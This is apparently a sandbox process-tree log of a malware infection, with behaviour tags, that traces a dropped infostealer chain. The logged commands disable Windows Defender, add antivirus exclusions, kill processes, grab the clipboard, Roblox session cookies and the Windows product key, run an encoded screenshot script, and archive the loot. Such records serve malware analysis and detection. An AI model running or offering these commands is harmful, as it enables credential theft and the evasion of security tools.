C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:18⤵PID:6660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:18⤵PID:4876
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"7⤵PID:5548
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account8⤵
- Checks processor information in registry
PID:5564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"5⤵
- Executes dropped EXE
PID:5768 -
C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI57682\Build.exe -pbeznogym7⤵PID:528
-
C:\Users\Admin\AppData\Local\Temp\_MEI57682\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI57682\Build.exe -pbeznogym8⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1624 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"9⤵
- Executes dropped EXE
PID:5476 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5700 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI54762\Build.exe -pbeznogym11⤵PID:720
-
C:\Users\Admin\AppData\Local\Temp\_MEI54762\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI54762\Build.exe -pbeznogym12⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5932 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4856
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"13⤵
- Executes dropped EXE
PID:5032 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6908
-
-
-
-
-
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"9⤵
- Executes dropped EXE
PID:5564 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6440 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"11⤵PID:5132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"11⤵PID:4000
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"11⤵PID:5040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"11⤵PID:752
-
C:\Windows\system32\tasklist.exetasklist /FO LIST12⤵
- Enumerates processes with tasklist
PID:5300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"11⤵PID:7124
-
C:\Windows\system32\tasklist.exetasklist /FO LIST12⤵
- Enumerates processes with tasklist
PID:5472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"11⤵PID:764
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName12⤵PID:5500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"11⤵PID:5696
-
C:\Windows\system32\tasklist.exetasklist /FO LIST12⤵
- Enumerates processes with tasklist
PID:6556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"11⤵
- Clipboard Data
PID:6452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard12⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:3784
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:1960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"11⤵PID:5448
-
C:\Windows\system32\systeminfo.exesysteminfo12⤵
- Gathers system information
PID:7472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="11⤵PID:3092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=12⤵
- Suspicious behavior: EnumeratesProcesses
PID:7464 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4h3vxpgv\4h3vxpgv.cmdline"13⤵PID:7888
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9292.tmp" "c:\Users\Admin\AppData\Local\Temp\4h3vxpgv\CSC8F0DE00E5D994AF38DE31D35C16F2C92.TMP"14⤵PID:7976
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:7480
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:7604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:7776
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:7872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:7924
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:8028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:8080
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:8152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:8176
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5540"11⤵PID:512
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 554012⤵
- Kills process with taskkill
PID:7212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5532"11⤵PID:1508
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 553212⤵
- Kills process with taskkill
PID:7200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5588"11⤵PID:7248
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 558812⤵
- Kills process with taskkill
PID:3496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5572"11⤵PID:7292
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 557212⤵
- Kills process with taskkill
PID:7444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6272"11⤵PID:7392
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 627212⤵
- Kills process with taskkill
PID:7660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6020"11⤵PID:1188
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 602012⤵
- Kills process with taskkill
PID:7748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6280"11⤵PID:7484
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 628012⤵
- Kills process with taskkill
PID:7428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6028"11⤵PID:4956
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 602812⤵
- Kills process with taskkill
PID:7836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6308"11⤵PID:2368
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 630812⤵
- Kills process with taskkill
PID:7880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6116"11⤵PID:7776
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 611612⤵
- Kills process with taskkill
PID:7984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6648"11⤵PID:7972
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 664812⤵
- Kills process with taskkill
PID:5172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1152"11⤵PID:4960
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 115212⤵
- Kills process with taskkill
PID:5468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4876"11⤵PID:2856
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 487612⤵
- Kills process with taskkill
PID:5064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"11⤵PID:7828
-
C:\Windows\system32\getmac.exegetmac12⤵PID:4000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 664"11⤵PID:640
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 66412⤵
- Kills process with taskkill
PID:7532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"11⤵PID:8160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY12⤵
- Command and Scripting Interpreter: PowerShell
PID:1556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"11⤵PID:6492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY12⤵PID:5432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exe a -r -hp"dxl1234" "C:\Users\Admin\AppData\Local\Temp\VAuoE.zip" *"11⤵PID:6124
-
C:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exe a -r -hp"dxl1234" "C:\Users\Admin\AppData\Local\Temp\VAuoE.zip" *12⤵
- Executes dropped EXE
PID:7188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"11⤵PID:512
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption12⤵PID:7232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"11⤵PID:7200
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:1508
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory12⤵PID:5568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"11⤵PID:5640
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid12⤵PID:7400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"11⤵PID:7424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER12⤵
- Command and Scripting Interpreter: PowerShell
PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"11⤵PID:5992
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name12⤵
- Detects videocard installed
PID:5952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"11⤵PID:5700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault12⤵PID:5772
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2c8776.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2c8776.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4928 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 16204⤵
- Program crash
PID:4016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 16124⤵
- Program crash
PID:5096
-
-
-
-
